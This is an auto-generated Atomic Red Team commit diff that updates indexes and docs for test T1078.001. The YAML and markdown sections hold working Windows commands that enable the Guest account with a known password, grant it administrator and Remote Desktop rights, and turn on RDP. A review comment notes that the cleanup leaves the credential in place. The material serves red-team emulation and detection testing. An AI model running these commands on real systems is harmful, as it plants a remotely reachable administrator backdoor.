Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-08-07 14:44:32 +00:00
parent c4706bb0d9
commit a97f3f7e3a
6 changed files with 70 additions and 36 deletions
+4 -4
@@ -24,7 +24,7 @@ privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced fil
privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -103,7 +103,7 @@ persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057f
persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -239,7 +239,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
@@ -663,6 +663,6 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
24 privilege-escalation T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
25 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
26 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
27 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
28 privilege-escalation T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
29 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
30 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
103 persistence T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
104 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
105 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
106 persistence T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
107 persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
108 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
109 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
239 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
240 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
241 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
242 defense-evasion T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
243 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
244 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
245 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
663 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
664 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
665 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
666 initial-access T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
667 initial-access T1566.001 Spearphishing Attachment 1 Download Phishing Attachment - VBScript 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
668 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
@@ -19,7 +19,7 @@ privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Lev
privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
@@ -74,7 +74,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
@@ -210,7 +210,7 @@ persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging S
persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
@@ -457,6 +457,6 @@ lateral-movement,T1021.006,Windows Remote Management,3,WMIC Process Call Create,
lateral-movement,T1021.006,Windows Remote Management,4,Psexec,9bab84a1-08fd-4245-b681-e62c78283002,command_prompt
lateral-movement,T1021.006,Windows Remote Management,5,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,6,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
19 privilege-escalation T1546.015 Component Object Model Hijacking 3 COM Hijack Leveraging registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
20 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
21 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
22 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
23 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
24 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
25 privilege-escalation T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
74 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
75 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
76 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
77 defense-evasion T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
78 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
79 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
80 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
210 persistence T1546.015 Component Object Model Hijacking 3 COM Hijack Leveraging registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
211 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
212 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
213 persistence T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
214 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
215 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
216 persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
457 lateral-movement T1021.006 Windows Remote Management 4 Psexec 9bab84a1-08fd-4245-b681-e62c78283002 command_prompt
458 lateral-movement T1021.006 Windows Remote Management 5 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
459 lateral-movement T1021.006 Windows Remote Management 6 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
460 initial-access T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
461 initial-access T1566.001 Spearphishing Attachment 1 Download Phishing Attachment - VBScript 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
462 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
+4 -4
@@ -49,7 +49,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -224,7 +224,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -501,7 +501,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
@@ -1262,7 +1262,7 @@
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -40,7 +40,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -159,7 +159,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
@@ -412,7 +412,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -953,7 +953,7 @@
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+44 -16
@@ -2359,20 +2359,27 @@ privilege-escalation:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1078.002:
@@ -10806,20 +10813,27 @@ persistence:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1136.002:
@@ -23211,20 +23225,27 @@ defense-evasion:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1578.003:
@@ -52115,20 +52136,27 @@ initial-access:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1078.002:
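Review bot: The `cleanup_command` block in this section (same text in the persistence, defense-evasion and initial-access hunks, and in the T1078.001.md section) does not reverse everything the `command` block does: `net user guest Password123!` sets a published password that no cleanup line resets, so after the test the Guest account is disabled but still holds a known credential, and the two `reg delete` lines remove the Terminal Server values rather than restoring their previous data, so a host that had `fDenyTSConnections` explicitly set is not returned to its prior state (whether an absent value is treated as deny is not shown here — verify before relying on it). Since this file is produced by the doc generator, the fix belongs in the source atomic definition for T1078.001 and would propagate here on the next run; the test name in the same source also carries the typo `priviliges`. A cleanup that matches the setup would capture both registry values before the `reg add` lines and write them back, and reset the Guest password to an unpublished value, e.g. `net user guest /random`, before disabling the account.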
+10 -4
@@ -6,13 +6,13 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Tests
- [Atomic Test #1 - Enable Guest account](#atomic-test-1---enable-guest-account)
- [Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-priviliges)
<br/>
## Atomic Test #1 - Enable Guest account
After execution the Default Guest account will be enabled (Active) and added to Administrators Group
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
**Supported Platforms:** Windows
@@ -24,14 +24,20 @@ After execution the Default Guest account will be enabled (Active) and added to
```cmd
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
